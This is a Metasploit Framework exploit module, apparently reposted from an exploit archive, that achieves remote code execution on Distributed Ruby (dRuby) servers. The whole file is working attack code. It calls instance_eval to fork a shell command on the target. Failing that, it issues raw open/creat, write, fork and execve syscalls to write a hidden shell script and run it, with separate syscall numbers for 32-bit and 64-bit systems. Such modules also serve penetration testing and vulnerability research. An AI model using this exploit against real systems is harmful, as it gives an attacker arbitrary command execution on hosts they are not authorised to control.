Distributed Ruby Send instance_eval/syscall Code Execution
Source: http://www.metasploit.com  Author: joernchen  Published: 2011-03-29

##
# $Id: drb_remote_codeexec.rb 12161 2011-03-27 20:00:06Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/framework/
##

require 'msf/core'
require 'drb/drb'
class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 def initialize(info = {})
  super(update_info(info, 
   'Name'           => 'Distributed Ruby Send instance_eval/syscall Code Execution',
   'Description'    => %q{
    This module exploits remote code execution vulnerabilities in dRuby
   },
   'Author'         => [ 'joernchen <joernchen@phenoelit.de> (Phenoelit)' ],
   'License'        => MSF_LICENSE,
   'Version'        => '$Revision: 12161 $',
   'References'     =>
    [
    ],
   'Privileged'     => false,
   'Payload'        =>
    {
     'DisableNops' => true,
     'Compat'      =>
      {
       'PayloadType' => 'cmd',
      },
     'Space'       => 32768,
    },
   'Platform'       => 'unix',
   'Arch'           => ARCH_CMD,
   'Targets'        => [[ 'Automatic', { }]],
   'DefaultTarget' => 0))

   
   register_options(
    [
     OptString.new('URI', [true, "The dRuby URI of the target host (druby://host:port)", ""]),
    ], self.class)
 end

 def exploit
  puts payload.encoded
  serveruri = datastore['URI']
  DRb.start_service 
  p = DRbObject.new_with_uri(serveruri)
  class << p
   undef :send
  end
  begin
   print_status('trying to exploit instance_eval')
   p.send(:instance_eval,"Kernel.fork { `#{payload.encoded}` }")

  rescue SecurityError => e
   print_status('instance eval failed, trying to exploit syscall')
   filename = "." + Rex::Text.rand_text_alphanumeric(16)
   begin

    # syscall to decide whether it's 64 or 32 bit:
    # it's getpid on 32bit which will succeed, and writev on 64bit
    # which will fail due to missing args
    j = p.send(:syscall,20)
    # syscall open  
    i =  p.send(:syscall,8,filename,0700)
    # syscall write
    p.send(:syscall,4,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
    # syscall close
    p.send(:syscall,6,i)
    # syscall fork
    p.send(:syscall,2)
    # syscall execve
    p.send(:syscall,11,filename,0,0)

   # not vulnerable
   rescue SecurityError => e
   
    print_status('target is not vulnerable')

   # likely 64bit system
   rescue => e
    # syscall creat
    i = p.send(:syscall,85,filename,0700)
    # syscall write
    p.send(:syscall,1,i,"#!/bin/sh\n" << payload.encoded,payload.encoded.length + 10)
    # syscall close
    p.send(:syscall,3,i)
    # syscall fork
    p.send(:syscall,57)
    # syscall execve
    p.send(:syscall,59,filename,0,0)
   end
  end
  print_status("payload executed from file #{filename}") unless filename.nil?
  print_status("make sure to remove that file") unless filename.nil?
  handler(nil)
 end
end
